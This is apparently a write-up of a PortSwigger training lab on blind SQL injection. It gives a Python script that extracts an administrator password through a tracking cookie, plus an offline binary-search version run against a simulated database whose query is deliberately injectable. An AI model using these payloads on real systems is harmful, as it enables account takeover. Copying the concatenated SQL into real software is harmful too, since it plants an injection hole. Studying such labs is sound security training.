
Lab: Blind SQL injection with conditional responses (write-up)

hy30nq 2024. 5. 7. 23:09

https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses

 

Lab: Blind SQL injection with conditional responses | Web Security Academy

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value ...

portswigger.net

 

While solving this lab, extracting the password with Burp Suite (one request per character per candidate value) takes a very long time, so the extraction is scripted instead.

 

Writing the exploit code

import requests

# Target details (the host and cookie values are specific to one lab instance;
# replace them with the ones from your own session)
base_url = "https://0af0007e044f347a83d314fc005100fb.web-security-academy.net"
endpoint = "/filter?category=Tech+gifts"
tracking_id = "ksooNQBgdn7Erw7G"   # the legitimate TrackingId value the lab issued
cookie = {
    "session": "JiN9qGeyRicgKjbx6gF3SBEUVWwVMlJp",
    "TrackingId": tracking_id
}

def condition_holds(injection):
    """Send the request with the injected condition appended to the TrackingId.
    The page contains "Welcome back!" only when the whole WHERE clause is true,
    so that string is the boolean oracle for blind extraction."""
    cookie['TrackingId'] = tracking_id + injection
    response = requests.get(base_url + endpoint, cookies=cookie, timeout=10)
    return "welcome" in response.text.lower()

def find_password_length():
    for length in range(1, 51):  # Testing for a password length up to 50 characters
        injection = f"' AND (SELECT LENGTH(password) FROM users WHERE username = 'administrator') = {length} -- 1"
        if condition_holds(injection):
            return length
    return 0  # Returns 0 if no length matched

def find_password(length):
    password = ''
    for position in range(1, length + 1):
        for ascii_value in range(32, 127):  # printable ASCII range
            injection = f"' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), {position}, 1)) = {ascii_value} -- 1"
            if condition_holds(injection):
                password += chr(ascii_value)
                print(f"Found character: {password[-1]} at position {position}")
                break
    return password

# Execute the functions
password_length = find_password_length()
if password_length > 0:
    print(f"Password length: {password_length}")
    password = find_password(password_length)
    print(f"Recovered password: {password}")
else:
    print("Failed to determine the password length.")
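
The script above walks the printable ASCII range linearly, which costs up to 95 requests per character on top of the length probe. The following version is an added example, not code from the original post: it replaces the linear scan with a binary search over "> mid" questions (at most 7 requests per character and 6 for the length), and it runs entirely offline. An in-memory SQLite database with a constructed users table and a planted administrator password stands in for the lab's database, and the server's "Welcome back" behaviour is simulated by whether the string-concatenated tracking query returns a row. ASCII() and SUBSTRING() are registered as user functions because SQLite does not provide them; the table names, the planted password and the exact shape of the server-side query are assumptions, not the lab's real implementation. Against the real lab you would replace the body of Oracle.__call__ with the HTTP request from the script above and keep everything else.

```python
import sqlite3

# Constructed sample data for the offline simulation (not the lab's real values).
SEED_TRACKING_ID = "ksooNQBgdn7Erw7G"
ADMIN_PASSWORD = "mdrtk3v8yc9y54ra4o0c"   # planted here so the result can be checked
PW_EXPR = "(SELECT password FROM users WHERE username = 'administrator')"


def make_db():
    """Build the stand-in database. Table and column names are assumptions."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no ASCII()/SUBSTRING(); register them so the lab-style payload
    # syntax (PostgreSQL/MySQL flavoured) runs unchanged.
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else None)
    conn.create_function("SUBSTRING", 3, lambda s, start, n: s[start - 1:start - 1 + n])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('administrator', ?)", (ADMIN_PASSWORD,))
    conn.execute("CREATE TABLE tracking (id TEXT)")
    conn.execute("INSERT INTO tracking VALUES (?)", (SEED_TRACKING_ID,))
    return conn


class Oracle:
    """Plays the vulnerable server: the cookie value is concatenated into SQL
    (deliberately injectable, as in the lab) and the answer is True exactly
    when the query returns a row, i.e. when the page would say 'Welcome back'."""

    def __init__(self):
        self.conn = make_db()
        self.requests = 0   # counts simulated HTTP requests

    def __call__(self, tracking_id):
        self.requests += 1
        sql = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"
        return self.conn.execute(sql).fetchone() is not None


def ask(oracle, condition):
    """Append a boolean condition to the legitimate TrackingId, lab style."""
    return oracle(SEED_TRACKING_ID + "' AND (" + condition + ") -- 1")


def bsearch(oracle, expr, lo, hi):
    """Find the integer value of SQL expression `expr`, known to lie in [lo, hi],
    using only 'expr > mid' questions. Invariant: the true value stays in [lo, hi]."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(oracle, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def recover_password(oracle, max_len=50):
    """Length first, then one binary search per character position."""
    length = bsearch(oracle, f"LENGTH({PW_EXPR})", 1, max_len)
    chars = []
    for pos in range(1, length + 1):
        # printable ASCII only, matching the range the linear script scans
        code = bsearch(oracle, f"ASCII(SUBSTRING({PW_EXPR}, {pos}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    oracle = Oracle()
    recovered = recover_password(oracle)
    print(f"Recovered password: {recovered}")
    print(f"Simulated requests: {oracle.requests}")
```

With a 20-character password the simulation needs at most 6 + 20 * 7 = 146 requests, against a worst case of 50 + 20 * 95 for the linear scan; the saving is what makes scripted extraction practical where clicking through Burp Intruder is not.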

 

Refer to the video above.

 

Recovered password: mdrtk3v8yc9y54ra4o0c

 

Your password will be different, since each lab instance generates its own.
